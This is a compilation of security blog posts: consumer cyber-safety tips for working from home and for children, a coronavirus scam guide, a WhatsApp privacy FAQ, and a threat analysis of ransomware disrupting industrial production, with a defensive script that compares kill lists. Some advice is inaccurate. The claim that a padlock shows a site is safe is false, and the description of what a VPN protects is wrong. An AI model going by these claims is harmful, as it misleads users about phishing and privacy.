Many workplaces have already instructed their staff to ‘social distance’ and work from home so we can ‘flatten the curve’, while others are probably not far away from making this decision. Many Australian states have given parents the option to keep their children at home. So, even if you (and the kids) are not yet home, it’s wise to start thinking about how our work (and learn) from home lives might look while we are ‘social-distancing’ and how we can keep our households safe when online. Here are a few things to consider:

  1. Breathe. These are Uncertain Times

It’s completely normal to feel anxious and stressed in this time of great uncertainty. While we are hopeful that ‘social distancing’ measures will help minimise the impact of the virus, the truth is – we just don’t really know what the upcoming months will look like. Acknowledging that you (and all your family members) will be feeling anxious and ‘out of sorts’ at the moment is essential. Cutting family members some slack, particularly if you are all ‘cooped up’ together will definitely make for a smoother self-isolation experience!

  2. Always Think Critically & Don’t Overload on News

When we are feeling panicked and stressed, it’s easy for our rational brains to stop functioning. Social media feeds have been full of ‘miracle cures’ for COVID-19 which have been of great interest to many stressed out peeps. PLEASE avoid clicking links and ‘buying into’ this. Not only could these be links to malicious websites designed to extract your private information, but these themes just feed our anxiety. Instead, seek out advice from reputable medical institutions and authorities. Being a critical thinker online is more important now than ever.

And if the constant barrage of news about the pandemic is affecting your (and your family’s) mood and outlook then take a break from it. Maybe limit yourself to checking for updates once per day as opposed to having constant updates come through on your phone. It’s super easy to disable news notifications: if you are an Apple user, here’s what you need to do and, if you are an Android user, these tips may help.

  3. Ensure You Are Using the Correct Platforms & Software

Before you start downloading programs you think are helpful, check with your workplace or employer about their preferred platforms. It’s highly likely you will have most of the programs they require whether it’s Facetime, Slack, Zoom or Trello. But if you don’t, please ensure you download apps from a reputable source such as the AppStore or Google Play or a site that has been approved by your employer. Third party app sites are to be avoided at all costs because the chances are, you’ll score yourself some malicious software!

  4. Protect Yourself & Your Data

Please check whether your employer has security software and a Virtual Private Network (VPN) installed on your devices. If not, or you are using your ‘home’ devices to undertake company work, then ensuring that both your stored data and the data you share over the internet is protected is essential.

Using a device without security software is a little like leaving your front door open – you are essentially inviting anyone to enter. So, investing in a comprehensive security software solution that protects you from dodgy downloads, visiting fake websites, malicious software and viruses is a no brainer! A VPN will also protect the data that you share from your devices by effectively creating an encrypted tunnel between your device and the router – the ultimate way of keeping the cybercriminals out!

  5. Back-Up Your Data

Check with your employer to ensure that all your data will be backed up, even when working from home. If they can’t guarantee your work will be backed up then you need to find yourself a reliable, safe option. I am a Dropbox fan but Google Drive is also a great tool. But if you need something a little more robust then check out IDrive or IBackUp.

And don’t forget about the kids! If your offspring are remote schooling, ensure all their hard work is backed up too. Google Drive or Dropbox is a great solution for students.

  6. Manage Your Internet Usage at Home

If your household has two adults working from home plus a tribe of kids remote schooling, then chances are your internet may slow. With more than 90% of Aussies now accessing the internet through the NBN, many are worried that the spike in demand may create havoc. While the folks from NBN keep assuring us that it’s all going to be fine, we may need to find ourselves staggering our internet use. Why not encourage your kids to do offline activities such as reading or craft while you have some designated time for emails or an online meeting? And don’t forget, you can always create a hotspot from your mobile for another internet source.

  7. Invest in Your Back & Neck – Splash Out on Some Gadgets

Setting up a designated workspace at home is critical to providing some structure in this new phase of your work life. Why not use this as an excuse to get properly setup?

I’ve worked from home for many years but could not have done so without my large monitor and my stand-up desk. Like many peeps, I have a dodgy neck so my stand-up desk and large monitor have meant that I can continue to work with no pain! I simply plug my laptop into my monitor and happy days – everything is enlarged and at eye height! On the days that I decide to work from my kitchen benchtop, my neck always starts to throb – you’d think I’d learn!

And don’t think you need to spend a fortune. A large monitor can cost as little as $200 and a stand-up desk not much more. If you are using these items for work, the chances are you’ll be able to claim these purchases as a tax deduction – why not talk to your accountant?

There is no doubt that 2020 will be ‘the year we will remember for the rest of our lives’. And while the bulk of us aren’t in the high-risk category, it is essential that we all do our bit so that we can protect our most vulnerable. So, please take the time to ensure you are cybersafe while setting up your new work (and school) from home life and even more importantly, keep washing your hands!!

Till Next Time

Stay well

Alex xx

The post How to Stay Cyber Safe While Social-Distancing appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh and cry, and it influences her routine and emotions.

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories they encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities: Securing devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world are more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, SmartTVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (use your password) and why passwords are necessary. Get into the habit of using 2-factor authentication for passwords and locking your device home screens with a pin code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills to process information or to be alone online. If you allow younger kids online, consider sitting with them, and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing on a secure network (VPN, Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child the private encrypted “tunnel” your content (searches, activity, messages) passes through and how that keeps other people from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shapes the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

Coronavirus Cybersecurity: Scams To Watch Out For

The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage their nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers.

That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with fewer cybersecurity measures in place than they would have in their office.

Examples of malicious messages seen:
  • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centre for Disease and Control (CDC), requesting a donation to research a vaccine.
  • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP'
  • messages advertising protective masks and hand sanitisers from bogus websites
So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

1. Phishing Scams 
This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

It’s also worth noting that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details.

2. Fake Websites
Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the search bar. If there is a padlock in the search bar this means the site is secure, if there isn't, then it’s a good idea to avoid this site. Not only this but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag. 

Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions, and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems too good to be true then it probably is.

3. App Scams 
Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

The reality, however, is that the app then installs malware onto your device and compromises not only your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet, demanding a ransom to get back in and threatening to delete all the information, contact details and photos stored inside.

4. Fake Coronavirus Maps
Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

Look for the Red Flags 
  • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
  • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
  • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

Honey, We’re Home! Securing Your Devices and Your Family Bond  

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Also, with a new work-at-home lifestyle, the software (with time limits) can make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think it’s a hassle, consider the simplicity of a password manager. Using a password manager will make passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life or school-life balance (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids teaches them the same value.

It’s a new frontier, parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private?

WhatsApp is one of the largest instant messengers and is considered by many a social network of its own. So, in continuing our app safety discussion, we’re diving into some of the top security hacks and questions many WhatsApp users and parents may have.

But first, what’s a security hack? In short, it’s an attempt to exploit the weaknesses in an app, network, or digital service to gain unauthorized access, usually for some illicit purpose. Here are just some of the concerns WhatsApp users may have and some suggestions on boosting security.

WhatsApp Hack FAQ

Are WhatsApp conversations private?

Yes — but there are exceptions. More than any other app, WhatsApp offers greater privacy thanks to end-to-end encryption that scrambles messages to ensure only you and the person you’re communicating with can read your messages or listen to your calls. Here’s the catch: WhatsApp messages (which include videos and photos) are vulnerable before they are encrypted and after they are decrypted if a hacker has managed to drop spyware on the phone. Spyware attacks on WhatsApp have already occurred. Safe Family Tip: No conversation shared between devices is ever 100% private. To increase your WhatsApp security, keep sensitive conversations and content offline, and keep your app updated. 

Can anyone read my deleted WhatsApp messages?

A WhatsApp user can access his or her own deleted messages via the chat backup function that automatically backs up all of your messages at 2 a.m. every day. WhatsApp users can delete a message by using the Delete for Everyone button within an hour after sending, though it’s not foolproof. Here’s the catch: Anyone who receives the message before it’s deleted can take a screenshot of it. So, there’s no way to ensure regrettable content isn’t captured, archived, or shared. There are also third-party apps that will recall deleted messages shared by others. Another possibility is that a hacker can access old chats stored in an app user’s cloud. Safe Family Tip: Think carefully about sharing messages or content you may regret later.

Can WhatsApp messages be deleted permanently?

Even if a WhatsApp user decides to delete a message, it’s no guarantee of privacy since conversations are two-way, and the person on the receiving end may screenshot or save a copy of a chat, video, or photo. On the security side, you may delete a message and see it disappear, but WhatsApp still retains a “forensic trace of the chat” that can be used by hackers for mining data, according to reports. Safe Family Tip: For extra security, turn off backups in WhatsApp’s Settings.

How can I secure my WhatsApp?

It’s crucial when using WhatsApp (or any other app) to be aware of common scams, including malware, catfishing, job and money scams, spyware, and file jacking. To amplify security, turn on Security Notifications in Settings, which will send an alert if, for some reason, your security code changes. Other ways to boost security: Use two-step verification, never share your 6-digit SMS verification code, disable cloud backup, and set your profile to private. Safe Family Tip: Install comprehensive family security software and secure physical access to your phone or laptop with facial, fingerprint, or passcode ID. Don’t open (block, report) messages from strangers or spammers. Never share personal information with people you don’t know.

How do I delete my WhatsApp account from another phone?

To delete a WhatsApp account, go to Settings > Account > Delete My Account. Deleting your account erases message history, removes you from groups, and deletes your backup data. According to WhatsApp, for users moving from one type of phone to another, such as from an iPhone to an Android, and keeping the same phone number, your account information stays intact, but you won’t be able to migrate messages across platforms. If you’re not keeping your number, you should delete WhatsApp from your old phone, download WhatsApp to your new phone, and verify your new phone number. Upgrading the same phone type will likely include options to migrate messages. Safe Family Tip: Before you give away or exchange an old phone, wipe it clean of all your data.

How do you know your WhatsApp is scanned?

WhatsApp users can easily sync devices by downloading the WhatsApp web app and activating it (Settings > WhatsApp Web/Desktop). Devices sync by scanning a QR code that appears on your laptop screen. You know your device is scanned when you see the green chat screen appear on your desktop. Safe Family Tip: It’s possible for a person with physical access to your desktop to scan your QR code and to gain account access. If you think someone has access to your account, log out of all your active web sessions in WhatsApp on your mobile phone.

How long are WhatsApp messages stored?

According to WhatsApp, once a user’s messages are delivered, they are deleted from WhatsApp servers. This includes chats, photos, videos, voice messages, and files. Messages can still be stored on each individual’s device. Safe Family Tip: The moment you send any content online, it’s out of your control. The person or group on the receiving end can still store it on their device or to their cloud service. Never send risky content. 

How secure is WhatsApp?

There’s no doubt that end-to-end encryption makes it much more difficult for hackers to read WhatsApp messages. WhatsApp is more secure than other messaging apps, but it is not 100% secure.

Is it true that WhatsApp has been hacked?

Yes. Several times and in various ways. No app, service, or network has proven to be unhackable. Safe Family Tip: Assume that any digital platform is vulnerable. Maximize privacy settings, never share risky content, financial information, or personal data.

Is WhatsApp safe to send pictures?

Encryption ensures that a transmission is secure, but that doesn’t mean WhatsApp content is safe or that human behavior is predictable. People (even trusted friends) can share private content. People can also illegally attempt to gain access to any content you’ve shared. This makes WhatsApp (along with other digital sharing channels) unsafe for exchanging sensitive information or photos. Safe Family Tip: Nothing on the internet is private. Never send or receive pictures that may jeopardize your privacy, reputation, or digital footprint.

WhatsApp isn’t the only popular app with security loopholes hackers exploit. Every app or network connected to the internet is at risk for some type of cyberattack. We hope this post sparks family discussions that help your kids use this and other apps wisely and helps keep your family’s privacy and safety online top of mind.

The post WhatsApp Security Hacks: Are Your ‘Private’ Messages Really Ever Private? appeared first on McAfee Blogs.

Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which expands the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

  • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
  • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
  • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.
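The comparison described above (shared kill-list entries plus one-character spelling differences such as “proficyclient.exe4”) can be automated once the lists have been extracted from samples. The following is an added example, not code from the original article: every list entry is constructed for illustration except the two proficyclient.exe spellings quoted in the text, and the sample names are placeholders.

```python
"""Compare process kill lists extracted from ransomware samples.

Every list entry below is constructed for illustration, except the two
spellings of proficyclient.exe, which are the ones discussed in the text.
"""
from itertools import combinations

# Constructed sample data: sample_a carries the typo, sample_b does not.
KILL_LISTS = {
    "sample_a": ["proficyclient.exe4", "example_hmi.exe",
                 "example_historian.exe", "example_db.exe",
                 "example_backup.exe"],
    "sample_b": ["ProficyClient.exe", "example_hmi.exe",
                 "example_historian.exe", "example_db.exe",
                 "example_backup.exe", "example_mail.exe"],
    "sample_c": ["example_browser.exe", "example_db.exe"],
}


def normalize(entries):
    """Lower-case and strip entries; drop blanks and duplicates."""
    return {e.strip().lower() for e in entries if e.strip()}


def jaccard(a, b):
    """Share of entries two lists have in common (0.0 to 1.0)."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def edit_distance(s, t):
    """Levenshtein distance, two-row dynamic programming."""
    prev = list(range(len(t) + 1))
    for i, cs in enumerate(s, 1):
        cur = [i]
        for j, ct in enumerate(t, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (cs != ct)))   # substitution
        prev = cur
    return prev[-1]


def near_misses(a, b, max_dist=1):
    """Entries unique to one list that sit within max_dist edits of an
    entry unique to the other: candidates for copy errors or fixes."""
    only_a, only_b = a - b, b - a
    return sorted((x, y) for x in only_a for y in only_b
                  if edit_distance(x, y) <= max_dist)


def compare(lists):
    """Pairwise report: overlap score plus near-miss spellings."""
    norm = {name: normalize(entries) for name, entries in lists.items()}
    report = {}
    for (n1, s1), (n2, s2) in combinations(sorted(norm.items()), 2):
        report[(n1, n2)] = {
            "jaccard": round(jaccard(s1, s2), 2),
            "near_misses": near_misses(s1, s2),
        }
    return report


if __name__ == "__main__":
    for pair, result in compare(KILL_LISTS).items():
        print(pair, result)
```

A high overlap score together with a near-miss pair is the pattern the text describes: two lists that share a source, one of which carries or corrects a copy error.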

Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information, containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

As recently as February 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shutdown of operations that lasted two days.

Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

  • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
  • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
